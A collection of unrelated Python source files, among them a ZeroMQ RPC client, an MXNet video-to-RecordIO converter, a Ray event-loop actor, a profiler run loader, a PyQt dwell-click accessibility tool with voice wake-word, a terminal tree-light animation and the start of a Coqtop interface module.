def __call__(self, *args, **kwargs):
if "_timeout" in kwargs:
timeout = kwargs['_timeout']
kwargs.pop('_timeout')
else:
timeout = self.client._timeout
return self.client._on_call(self.name, timeout, args, kwargs)
class Client(object):
def __init__(self, address, timeout=60, threaded=True):
self.__context = zmq.Context(1)
self._timeout = timeout
self.__address = tuple(address)
self.__threaded = threaded
if threaded:
self.__tlocal = threading.local()
else:
class _(object):
pass
self.__tlocal = _()
@property
def __socket(self):
if hasattr(self.__tlocal, "socket"):
return self.__tlocal.socket
else:
self.__tlocal.socket = self.__context.socket(zmq.REQ)
self.__tlocal.socket.connect("tcp://%s:%s"%self.__address)
if not hasattr(self.__tlocal, "poller"):
self.__tlocal.poller = zmq.Poller()
self.__tlocal.poller.register(self.__tlocal.socket, zmq.POLLIN)
return self.__tlocal.socket
@__socket.setter
def __socket(self, value):
self.__tlocal.socket = value
@property
def __poller(self):
if hasattr(self.__tlocal, "poller"):
return self.__tlocal.poller
else:
self.__tlocal.poller = zmq.Poller()
self.__tlocal.poller.register(self.__socket, zmq.POLLIN)
return self.__tlocal.poller
def __on_timeout(self):
self.__poller.unregister(self.__socket)
self.__socket.setsockopt(zmq.LINGER, 0)
self.__socket.close()
self.__socket = self.__context.socket(zmq.REQ)
self.__socket.connect("tcp://%s:%s"%self.__address)
self.__poller.register(self.__socket, zmq.POLLIN)
def _on_call(self, name, timeout, args, kwargs):
msg = msgpack.packb(["request", '', name, args, kwargs], encoding="utf-8")
self.__socket.send_multipart([msg])
socks = self.__poller.poll(timeout*1000)
if socks:
frames = self.__socket.recv_multipart()
if len(frames) == 1:
msg = msgpack.unpackb(frames[0], encoding="utf-8")
else:
raise UnknownFormat("unknow format")
if msg[0] == "replay":
return msg[2]
elif msg[0] == "exception":
raise RemoteException("{0}".format(msg[2]))
else:
raise UnknownMessageType("unknow message type")
else:
#if timeout we have to close the old one and create a new one
#TODO:(cd)according to the zmq's doc, it's a bad behaviour to create and close lots of sockets
self.__on_timeout()
raise Timeout("timeout")
def __close(self):
self.__poller.unregister(self.__socket)
self.__socket.setsockopt(zmq.LINGER, 0)
self.__socket.close()
self.__context.term()
def __getattr__(self, name):
return Call(name, self)
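# Usage sketch (added for illustration; assumes a zmqdrpc server exposing an
# `echo` method listens on 127.0.0.1:5555):
# client = Client(("127.0.0.1", 5555), timeout=10)
# result = client.echo("hello")               # blocks; raises Timeout on expiry
# result = client.echo("hello", _timeout=5)   # per-call timeout override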
class AsyncClient(object):
def __init__(self, address, timeout=60, threaded=True):
self.__exit_flag = threading.Event()
self.__address = tuple(address)
self._timeout = timeout
self.__uid = uuid.uuid1().hex
self.__context = zmq.Context(1)
self.__io_thread = threading.Thread(target=self.__io)
self.__io_thread.daemon = True
self.__io_thread.start()
self.__replays = {}
self.__threaded = threaded
if threaded:
self.__tlocal = threading.local()
else:
class _(object):
pass
self.__tlocal = _()
@property
def __push_socket(self):
if hasattr(self.__tlocal, "socket"):
return self.__tlocal.socket
else:
self.__tlocal.socket = self.__context.socket(zmq.PUSH)
self.__tlocal.socket.connect("inproc://zmqdrpc-%s"%self.__uid)
return self.__tlocal.socket
@__push_socket.setter
def __push_socket(self, value):
self.__tlocal.socket = value
def _on_call(self, name, timeout, args, kwargs):
#TODO:(cd)make request id short
request_id = uuid.uuid1().hex
msg = msgpack.packb(["request", request_id, name, args, kwargs], encoding="utf-8")
replay = Replay(request_id, time.time() + timeout)
self.__replays[request_id] = replay
self.__push_socket.send_multipart([msg])
return replay
def __io(self):
self.__pull_socket = self.__context.socket(zmq.PULL)
self.__pull_socket.bind("inproc://zmqdrpc-%s"%self.__uid)
self.__socket = self.__context.socket(zmq.DEALER)
self.__socket.connect("tcp://%s:%s"%self.__address)
self.__poller = zmq.Poller()
self.__poller.register(self.__pull_socket, zmq.POLLIN)
self.__poller.register(self.__socket, zmq.POLLIN)
try:
while 1:
socks = dict(self.__poller.poll(1000))
if socks.get(self.__pull_socket) == zmq.POLLIN:
frames = self.__pull_socket.recv_multipart()
#add an empty frame to behave like REQ
self.__socket.send_multipart([b''] + frames)
if socks.get(self.__socket) == zmq.POLLIN:
#skip the empty frame
frames = self.__socket.recv_multipart()[1:]
if len(frames) == 1:
msg = msgpack.unpackb(frames[0], encoding="utf-8")
else:
LOGGER.warn("recv unknown format message")
continue
if msg[0] == "replay":
rep = msg[2]
is_error = False
elif msg[0] == "exception":
rep = RemoteException("{0}".format(msg[2]))
is_error = True
else:
LOGGER.warn("unknow message type: %s", msg[0])
continue
request_id = msg[1]
if request_id in self.__replays:
self.__replays[request_id]._Replay__set(rep, is_error)
self.__replays.pop(request_id)
now = time.time()
self.__replays = dict((item for item in self.__replays.items() if now < item[1].timeout_at))
if self.__exit_flag.isSet():
break
finally:
self.__pull_socket.setsockopt(zmq.LINGER, 0)
self.__socket.setsockopt(zmq.LINGER, 0)
self.__pull_socket.close()
self.__socket.close()
self.__context.term()
def __getattr__(self, name):
return Call(name, self)
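# Usage sketch (added for illustration; same hypothetical server as above):
# aclient = AsyncClient(("127.0.0.1", 5555), timeout=10)
# replay = aclient.echo("hello")   # returns a Replay object immediately
# value = replay.get()             # blocks until the reply arrives; raises
#                                  # Timeout or RemoteException otherwise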
|
video2rec.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
curr_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
import pdb
try:
import multiprocessing
except ImportError:
multiprocessing = None
def read_video_txt(path_in,frame_per_video):
"""
read txtfile
Parameters:
---------
path_in : str
txtfile path
frame_per_video : int
number of frames to sample per video
Returns:
---------
[index,image_path,label] as iterator
"""
num_index=0
with open(path_in) as fin:
while True:
line = fin.readline()
#print line
if not line:
break
line = [i.strip() for i in line.strip().split(' ')]
line_len = len(line)
if line_len < 3:
print('lst should have at least three parts, but only has %s parts for %s' % (line_len, line))
continue
try:
label = float(line[-1])
length = int(line[1])
new_length = 1
average_duration = length/frame_per_video
for i in range(0,frame_per_video):
if average_duration >= new_length:
if (i+1)*average_duration <= length:
offset = int(random.uniform(i* average_duration,(i+1)*average_duration))
else:
offset = int(random.uniform(i* average_duration,length))
if offset <= 0:
offset = 1
elif offset >= length:
offset = length
image_path = line[0] + "/img_%05d.jpg"%(offset)
index = int(num_index + i)
item = [index] + [image_path] + [label]
yield item
num_index += frame_per_video
except Exception as e:
print('Parsing lst met error for %s, detail: %s' %(line, e))
continue
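# Expected input format (added for illustration; the path is hypothetical):
# each line of the txt file is "<frames_dir> <num_frames> <label>", e.g.
#   ucf101_frames/v_ApplyEyeMakeup_g01_c01 120 0
# For every video, frame_per_video frames are sampled and yielded as
# [index, "<frames_dir>/img_%05d.jpg" % offset, label].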
def image_encode(args, i, item, q_out):
"""
loading and processing image
Parameters:
---------
args:
image augment argument
i: int
the index of image in iterator
item : list
index,image_path and label of image in datasets
q_out : queue
saving results in the form of (i, pack_img, item)
"""
# fullpath = os.path.join(args.root, item[1])
fullpath = item[1]
if len(item) > 3 and args.pack_label:
header = mx.recordio.IRHeader(0, item[2:], item[0], 0)
else:
header = mx.recordio.IRHeader(0, item[2], item[0], 0)
if args.pass_through:
try:
with open(fullpath, 'rb') as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, item))
except Exception as e:
traceback.print_exc()
print('pack_img error:', item[1], e)
q_out.put((i, None, item))
return
try:
img = cv2.imread(fullpath, args.color)
except:
traceback.print_exc()
print('imread error trying to load file: %s ' % fullpath)
q_out.put((i, None, item))
return
if img is None:
print('imread read blank (None) image for file: %s' % fullpath)
q_out.put((i, None, item))
return
if args.center_crop:
if img.shape[0] > img.shape[1]:
margin = (img.shape[0] - img.shape[1]) // 2;
img = img[margin:margin + img.shape[1], :]
else:
margin = (img.shape[1] - img.shape[0]) // 2;
img = img[:, margin:margin + img.shape[0]]
if args.resize:
if img.shape[0] > img.shape[1]:
newsize = (args.resize, img.shape[0] * args.resize // img.shape[1])
else:
newsize = (img.shape[1] * args.resize // img.shape[0], args.resize)
img = cv2.resize(img, newsize)
try:
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, item))
except Exception as e:
traceback.print_exc()
print('pack_img error on file: %s' % fullpath, e)
q_out.put((i, None, item))
return
def read_worker(args, q_in, q_out):
"""
loading and processing image by multiprocessing
Parameters:
---------
args:
image augment argument
q_in: multiprocessing.Queue
queue of (i, item) pairs to process, where item is [index, image_path, label]
q_out:multiprocessing.Queue()
saving results in the form of (i, pack_img, item)
"""
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
"""
saving images into a .rec file in a separate process
Parameters:
---------
q_out: multiprocessing.Queue
contain processed image in the form of (i,pack_img,item)
fname:str
txtfile path
working_dir:str
path to folder containing txtfile
"""
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output txt and rec files.')
parser.add_argument('--frame-per-video', type=int, default=3,help='frame per video')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--pass-through', action='store_true',
help='whether to skip transformation and save image as is')
rgroup.add_argument('--resize', type=int, default=0,
help='resize the shorter edge of image to the newsize, original images will\
be packed by default.')
rgroup.add_argument('--center-crop', action='store_true',
help='specify whether to crop the center image to make it rectangular.')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', action='store_true',
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
return args
if __name__ == '__main__':
args = parse_args()
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.txt'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_video_txt(fname,args.frame_per_video)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
print (i ,item)
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, _ = q_out.get()
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
print('Did not find any list file with prefix %s' % args.prefix)
|
simpleeca.py
|
import asyncio
import random
import ray
import threading
import time
async def some_event_step(stepid):
await asyncio.sleep(random.uniform(2, 4))
return stepid
@ray.remote
class SimpleECA:
def __init__(self):
self.pool = []
try:
self.thread = threading.Thread(target=asyncio.run, args=(self.listener_loop(),))
self.thread.daemon = True
self.thread.start()
print('thread started')
except BaseException as err:
print(err)
print ("Error: unable to start thread")
async def register_event(self, stepid):
self.pool.append(stepid)
return 'registered'
async def listener_loop(self):
while True:
await asyncio.sleep(3)
print(f"pool {self.pool}")
if len(self.pool) > 0:
listeners = set()
for e in self.pool:
listeners.add(some_event_step(e))
finished, unfinished = await asyncio.wait(listeners, timeout=5,
return_when=asyncio.FIRST_COMPLETED)
for item in finished:
print(f"event {item.result()} arrived")
self.pool.remove(item.result())
async def check_status(self):
return self.pool  # self.pool is a list, so return it directly
ray.init(address='auto')
async def __main__(*args, **kwargs):
eca = SimpleECA.remote()
obj1 = await eca.register_event.remote('step_0001')
print('step_0001 registered')
await asyncio.sleep(2)
obj2 = await eca.register_event.remote('step_0002')
print('step_0002 registered')
await asyncio.sleep(20)
asyncio.run(__main__())
|
loader.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# --------------------------------------------------------------------------
import bisect
import os
import sys
from collections import defaultdict
from .. import consts, io, utils
from ..run import Run
from .multiprocessing import Process, Queue
from .data import DistributedRunProfileData, RunProfileData
from .run_generator import DistributedRunGenerator, RunGenerator
logger = utils.get_logger()
class RunLoader(object):
def __init__(self, name, run_dir, caches):
self.run_name = name
self.run_dir = run_dir
self.caches = caches
self.queue = Queue()
def load(self):
workers = []
spans_by_workers = defaultdict(list)
for path in io.listdir(self.run_dir):
if io.isdir(io.join(self.run_dir, path)):
continue
match = consts.WORKER_PATTERN.match(path)
if not match:
continue
worker = match.group(1)
span = match.group(2)
if span is not None:
# remove the starting dot (.)
span = span[1:]
bisect.insort(spans_by_workers[worker], span)
workers.append((worker, span, path))
span_index_map = {}
for worker, span_array in spans_by_workers.items():
for i, span in enumerate(span_array, 1):
span_index_map[(worker, span)] = i
for worker, span, path in workers:
# convert the span timestamp to the index.
span_index = None if span is None else span_index_map[(worker, span)]
p = Process(target=self._process_data, args=(worker, span_index, path))
p.start()
logger.info("started all processing")
distributed_run = Run(self.run_name, self.run_dir)
run = Run(self.run_name, self.run_dir)
num_items = len(workers)
while num_items > 0:
item = self.queue.get()
num_items -= 1
r, d = item
if r or d:
logger.debug("Loaded profile via mp.Queue")
if r is not None:
run.add_profile(r)
if d is not None:
distributed_run.add_profile(d)
distributed_profiles = self._process_spans(distributed_run)
for d in distributed_profiles:
if d is not None:
run.add_profile(d)
# Non-daemon processes do not need an explicit join here; they are joined automatically.
return run
def _process_data(self, worker, span, path):
import absl.logging
absl.logging.use_absl_handler()
try:
logger.debug("Parse trace, run_dir=%s, worker=%s", self.run_dir, path)
local_file = self.caches.get_remote_cache(io.join(self.run_dir, path))
data, trace_path = RunProfileData.parse(worker, span, local_file)
if trace_path != local_file:
self.caches.add_file(local_file, trace_path)
generator = RunGenerator(worker, span, data)
profile = generator.generate_run_profile()
dist_data = DistributedRunProfileData(data)
logger.debug("Sending back profile via mp.Queue")
self.queue.put((profile, dist_data))
except KeyboardInterrupt:
logger.warning("tb_plugin receive keyboard interrupt signal, process %d will exit" % (os.getpid()))
sys.exit(1)
except Exception as ex:
logger.warning("Failed to parse profile data for Run %s on %s. Exception=%s",
self.run_name, worker, ex, exc_info=True)
self.queue.put((None, None))
logger.debug("finishing process data")
def _process_spans(self, distributed_run):
spans = distributed_run.get_spans()
if spans is None:
return [self._process_distributed_profiles(distributed_run.get_profiles(), None)]
else:
span_profiles = []
for span in spans:
profiles = distributed_run.get_profiles(span=span)
p = self._process_distributed_profiles(profiles, span)
if p is not None:
span_profiles.append(p)
return span_profiles
def _process_distributed_profiles(self, profiles, span):
has_communication = True
comm_node_lists = []
for data in profiles:
logger.debug("Processing profile data")
# Set has_communication to False and disable distributed view if any one worker has no communication
if data.has_communication and data.comm_node_list:
comm_node_lists.append(data.comm_node_list)
if len(comm_node_lists[-1]) != len(comm_node_lists[0]):
logger.error("Number of communication operation nodes don't match between workers in run: %s" % self.run_name)
has_communication = False
else:
has_communication = False
logger.debug("Processing profile data finish")
if not has_communication:
logger.debug("There is no communication profile in this run.")
return None
worker_num = len(comm_node_lists)
for i, node in enumerate(comm_node_lists[0]):
kernel_range_size = len(node.kernel_ranges)
# loop for all communication kernel ranges in order
for j in range(kernel_range_size):
min_range = sys.maxsize
# For each kernel_range, take the minimum across workers as the real communication time
for k in range(worker_num):
kernel_ranges = comm_node_lists[k][i].kernel_ranges
if len(kernel_ranges) != kernel_range_size:
logger.error("Number of communication kernels don't match between workers in run: %s" % self.run_name)
has_communication = False
return None
if kernel_ranges:
if kernel_ranges[j][1] - kernel_ranges[j][0] < min_range:
min_range = kernel_ranges[j][1] - kernel_ranges[j][0]
for k in range(worker_num):
kernel_range = comm_node_lists[k][i].kernel_ranges[j]
comm_node_lists[k][i].real_time_ranges.append((kernel_range[1] - min_range, kernel_range[1]))
for data in profiles:
data.communication_parse()
generator = DistributedRunGenerator(profiles, span)
profile = generator.generate_run_profile()
return profile
|
test3.py
|
import sys
from PyQt5 import QtGui,QtWidgets,QtCore
from PyQt5.QtWidgets import QWidget, QGridLayout, QPushButton, QSizePolicy, QApplication, QDesktopWidget
import threading
from pynput.mouse import Button,Controller
from pynput.keyboard import Controller as KController
from pynput.keyboard import Key
import time
import struct
import pyaudio
import pvporcupine
mouse = Controller() #for controlling mouse cursor
keyboard=KController()
w=0
h=0
flag = True #to execute threads one at a time
#This class represents the secondary status window
class Window(QWidget):
def __init__(self, tt):
super().__init__()
self.setWindowTitle("Mode Window")
self.setWindowIcon(QtGui.QIcon("Python-symbol.jpg"))
label = QtWidgets.QLabel(self) #label represents window's text
label.setText(tt)
label.setFont(QtGui.QFont('Arial', 20))
label.adjustSize() #window size depends on text length
label.setSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
self.setAttribute(QtCore.Qt.WA_TransparentForMouseEvents) #disables mouse events on window
self.setStyleSheet("color:black; background-color: white;")
self.setWindowOpacity(0.60)
flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
self.setWindowFlags(flags)
self.show()
#To position the window above taskbar on the bottom right corner
ab = QDesktopWidget().screenGeometry()
width = self.frameGeometry().width()
height = self.frameGeometry().height()
global w
global h
w=int(width)
h=int(height)
dw = app.desktop()
t_h = dw.screenGeometry().height() - dw.availableGeometry().height()
self.move(ab.width()-width, dw.screenGeometry().height()-t_h-height)
#This class represents the primary GUI window
class GridDemo(QWidget):
def __init__(self):
super().__init__()
self.win = Window('Left-Click Mode') #instantiating the status window class
self.center()
flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
self.setWindowFlags(flags)
self.setWindowTitle("GUI Window")
self.setWindowIcon(QtGui.QIcon("Python-symbol.jpg"))
self.setStyleSheet("background-color: black")
values = ['Left-Click', 'No-Click', 'Hover', 'Double-Click', '', 'Right-Click', 'Scroll', 'On-Screen Keyboard', 'Drag'] #represents each button on GUI
positions = [(r, c) for r in range(4) for c in range(3)]
layout = QGridLayout()
self.setLayout(layout)
for position, value in zip(positions, values): #for each button in the grid,
self.button = QPushButton(value)
self.button.setStyleSheet("QPushButton{color:black; background-color : white; font-size: 17px; }QPushButton::pressed{background-color : #C0C0C0;}")
self.button.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
layout.addWidget(self.button, *position)
self.button.clicked.connect(self.btnClicked) #if clicked, call btnClicked()
#This function is used to bind actions to buttons on the grid when clicked
def btnClicked(self):
global flag
sender = self.sender()
if sender.text() == "Left-Click": #to identify the clicked button
self.close() #closes primary window
self.win = Window('Left-Click Mode')
flag = False #stop execution of current thread
time.sleep(0.3)
flag = True
left = threading.Thread(target=left_click, daemon=True) #create a new thread for executing left_click()
left.start()
elif sender.text() == "No-Click":
self.close()
self.win = Window('No-Click Mode')
flag = False
time.sleep(0.3)
flag = True
nc = threading.Thread(target=no_click, daemon=True)
nc.start()
elif sender.text() == "On-Screen Keyboard":
self.close()
with keyboard.pressed(Key.cmd): #to close the keyboard, if user clicks cmd+ctrl+o
with keyboard.pressed(Key.ctrl):
keyboard.press('o')
keyboard.release('o')
elif sender.text() == "Hover":
self.close()
self.win = Window('Hover Mode')
flag = False
time.sleep(0.3)
flag = True
hr = threading.Thread(target=hover, daemon=True)
hr.start()
elif sender.text() == "Double-Click":
self.close()
self.win = Window('Double-Click Mode')
flag = False
time.sleep(0.3)
flag = True
dc = threading.Thread(target=double_click, daemon=True)
dc.start()
elif sender.text() == "Right-Click":
self.close()
self.win = Window('Right-Click Mode')
flag = False
time.sleep(0.3)
flag = True
right = threading.Thread(target=right_click, daemon=True)
right.start()
elif sender.text() == "Scroll":
self.close()
self.win = Window('Scroll Mode')
flag = False
time.sleep(0.3)
flag = True
sc = threading.Thread(target=scroll, daemon=True)
sc.start()
elif sender.text() == "Drag":
self.close()
self.win = Window('Drag Mode')
flag = False
time.sleep(0.3)
flag = True
dr = threading.Thread(target=drag, daemon=True)
dr.start()
#This function is used to center the primary gui window
def center(self):
ab = QDesktopWidget().screenGeometry()
        w = int(ab.width()*0.3)
        h = int(ab.height()*0.3)
        self.resize(w, h) #Qt expects integer pixel sizes
        x = w // 2
        y = h // 2
        self.move((ab.width()//2)-x, (ab.height()//2)-y)
#This function performs no actions and runs till flag becomes false
def no_click():
while True:
global flag
if(flag==False): #to stop execution when another mouse mode is selected
print("Exited no click")
break
time.sleep(0.25)
#This function performs a left click action
def left_click():
print("left click")
prevx = -1 #to detect cursor's deviations
prevy = -1
count=0
while True:
global flag
if(flag==False):
print("Exited left click")
break
#print("Entered loop")
x,y=mouse.position
#print("("+str(x)+","+str(y)+")")
        if (x<=prevx+5 and x>=prevx-5 and y<=prevy+5 and y>=prevy-5): #if the cursor has dwelled (stayed within a 5-pixel window of its previous position)
count=count+1
if(count>=3):
mouse.click(Button.left)
print("Mouse clicked")
count=0
else:
count=0
prevx=x
prevy=y
time.sleep(0.25)
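#NOTE: right_click(), double_click(), hover(), drag() and scroll() below reuse this
#dwell pattern: the cursor is sampled every 0.25s and the action fires once it stays
#inside a 5-pixel window for enough consecutive samples (3 samples, i.e. about 0.75s;
#hover waits for 8 samples). These thresholds are tuning choices, not requirements.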
#This function performs a right click action
def right_click():
print("right click")
prevx = -1
prevy = -1
count=0
while True:
global flag
if (flag==False):
print("Exited right click")
break
#print("Entered loop")
x,y=mouse.position
#print("("+str(x)+","+str(y)+")")
if (x<=prevx+5 and x>=prevx-5 and y<=prevy+5 and y>=prevy-5):
count=count+1
if(count>=3):
mouse.click(Button.right)
print("Mouse clicked")
count=0
else:
count=0
prevx=x
prevy=y
time.sleep(0.25)
#This function performs two consecutive left clicks
def double_click():
prevx = -1
prevy = -1
count=0
while True:
global flag
if (flag==False):
print("Exited double click")
break
#print("Entered loop")
x,y=mouse.position
#print("("+str(x)+","+str(y)+")")
if (x<=prevx+5 and x>=prevx-5 and y<=prevy+5 and y>=prevy-5):
count=count+1
if(count>=3):
mouse.click(Button.left,2)
print("Mouse clicked")
count=0
else:
count=0
prevx=x
prevy=y
time.sleep(0.25)
#This function performs a left click with extended delay to hover
def hover():
prevx = -1
prevy = -1
count=0
while True:
global flag
if (flag==False):
print("Exited hover mode")
break
#print("Entered loop")
x,y=mouse.position
#print("("+str(x)+","+str(y)+")")
if (x<=prevx+5 and x>=prevx-5 and y<=prevy+5 and y>=prevy-5):
count=count+1
if(count>=8):
mouse.click(Button.left)
print("Mouse clicked")
count=0
else:
count=0
prevx=x
prevy=y
time.sleep(0.25)
#This function alternates between mouse press & release to perform a mouse drag
def drag():
prevx = -1
prevy = -1
count=0
drag_on=0 #to alternate between mouse's press and release
while True:
global flag
if (flag==False):
print("Exited drag mode")
break
#print("Entered loop")
x,y=mouse.position
#print("("+str(x)+","+str(y)+")")
if (x<=prevx+5 and x>=prevx-5 and y<=prevy+5 and y>=prevy-5):
count=count+1
if(count>=3):
if(drag_on==0):
mouse.press(Button.left)
else:
mouse.release(Button.left)
drag_on=1-drag_on
count=0
else:
count=0
prevx=x
prevy=y
time.sleep(0.25)
#This function uses the mouse middle button to perform scrolling
def scroll():
prevx = -1
prevy = -1
count=0
while True:
global flag
if (flag==False):
print("Exited scroll mode")
break
#print("Entered loop")
x,y=mouse.position
#print("("+str(x)+","+str(y)+")")
if (x<=prevx+5 and x>=prevx-5 and y<=prevy+5 and y>=prevy-5):
count=count+1
if(count>=3):
mouse.click(Button.middle)
print("Mouse clicked")
count=0
else:
count=0
prevx=x
prevy=y
time.sleep(0.25)
#This function centers the mouse cursor and selects left click mode each time the gui pops up
def winCheck():
global w
global h
while True:
check = demo.isActiveWindow()
#print("Active window : " + str(check))
if (check): #if window is actively in foreground
print(threading.active_count())
xy = QDesktopWidget().screenGeometry()
x=int(xy.width())
y=int(xy.height())
mouse.position = (int(x/2),int(y/2)) #centers the mouse cursor
global flag
flag = False
time.sleep(0.3)
flag = True
left = threading.Thread(target=left_click,daemon=True) #creates a thread for left click operation
left.start()
while (demo.isActiveWindow()):
time.sleep(1)
def wake(demo):
porcupine = None
pa = None
audio_stream = None
try:
porcupine = pvporcupine.create(keywords=["computer"])
pa = pyaudio.PyAudio()
audio_stream = pa.open(
rate=porcupine.sample_rate,
channels=1,
format=pyaudio.paInt16,
input=True,
frames_per_buffer=porcupine.frame_length)
while True:
pcm = audio_stream.read(porcupine.frame_length)
pcm = struct.unpack_from("h" * porcupine.frame_length, pcm)
keyword_index = porcupine.process(pcm)
if keyword_index >= 0:
print("Hotword Detected")
demo.show()
demo.activateWindow()
finally:
if porcupine is not None:
porcupine.delete()
if audio_stream is not None:
audio_stream.close()
if pa is not None:
pa.terminate()
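#NOTE: the pvporcupine.create() call in wake() above assumes a library version whose
#bundled "computer" keyword works without credentials; newer pvporcupine releases may
#also require an access_key argument, so adjust the call for the installed version.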
if __name__ == "__main__":
left = threading.Thread(target=left_click, daemon=True) #creates a thread for left click operation initially
left.start()
app = QApplication(sys.argv)
demo = GridDemo() #instantiates the primary gui window
demo.show()
wc = threading.Thread(target=winCheck,daemon=True)
wc.start()
wk = threading.Thread(target=wake,daemon=True,args=(demo,))
wk.start()
sys.exit(app.exec_())
|
treeRender.py
|
import threading
import random
import os
import time
mutex = threading.Lock()
tree = list(open('treeTemplate.txt').read().rstrip())
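# Assumed input format (treeTemplate.txt is not shown here): any ASCII-art tree in
# which the characters Y, R, G and B mark where yellow, red, green and blue lights
# should blink; every other character is printed verbatim.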
def formatColor(color):
    # ANSI escape sequences: 93 = bright yellow, 91 = bright red, 92 = bright green,
    # 94 = bright blue; '\033[0m' resets the color afterwards
    if color == 'Y':
        return '\033[93m⏺\033[0m'
    if color == 'R':
        return '\033[91m⏺\033[0m'
    if color == 'G':
        return '\033[92m⏺\033[0m'
    if color == 'B':
        return '\033[94m⏺\033[0m'
def lights(color):
indexes = lightList[color]
lightOff = True
while True:
for index in indexes:
tree[index] = formatColor(color) if lightOff else '⏺'
# Critical section
mutex.acquire()
os.system('cls' if os.name == 'nt' else 'clear') # Clears screen
print(''.join(tree))
mutex.release()
lightOff = not lightOff
time.sleep(random.uniform(0.5, 1.5)) # Randomness of light blink
lightList = { # Dictionary of indices of lights on tree
"Y": [],
"R": [],
"G": [],
"B": []
}
threadList = { # Dictionary of various color threads; args must be a one-element tuple
    "Y": threading.Thread(target=lights, args=("Y",)),
    "R": threading.Thread(target=lights, args=("R",)),
    "G": threading.Thread(target=lights, args=("G",)),
    "B": threading.Thread(target=lights, args=("B",))
}
for index, char in enumerate(tree):
if char in "YRGB":
lightList[char].append(index)
tree[index] = '⏺'
for thread in threadList.values():
thread.start()
for thread in threadList.values():
thread.join()
|
coqtop.py
|
# -*- coding: utf8 -*-
# Author: Wolf Honore
"""Coqtop interface with functions to send commands and parse responses."""
import datetime
import logging
import signal
import subprocess
import threading
import time
from concurrent import futures
from queue import Empty, Queue
from tempfile import NamedTemporaryFile
from typing import (
IO,
TYPE_CHECKING,
Any,
Iterable,
Iterator,
List,
Mapping,
Optional,
Tuple,
Union,
)
from xmlInterface import (
TIMEOUT_ERR,
UNEXPECTED_ERR,
Err,
FindCoqtopError,
Goals,
Ok,
Result,
XMLInterface,
XMLInterfaceBase,
partition_warnings,
prettyxml,
)
if TYPE_CHECKING:
# pylint: disable=unsubscriptable-object
from typing_extensions import TypedDict
BytesQueue = Queue[bytes]
CoqtopProcess = subprocess.Popen[bytes]
VersionInfo = TypedDict(
"VersionInfo",
{
"version": Tuple[int, int, int],
"str_version": str,
"latest": Optional[str],
},
)
else:
BytesQueue = Queue
CoqtopProcess = subprocess.Popen
VersionInfo = Mapping[str, Any]
class CoqtopError(Exception):
"""An exception for when Coqtop stops unexpectedly."""
class Coqtop:
"""Provide an interface to the background Coqtop process."""
def __init__(self) -> None:
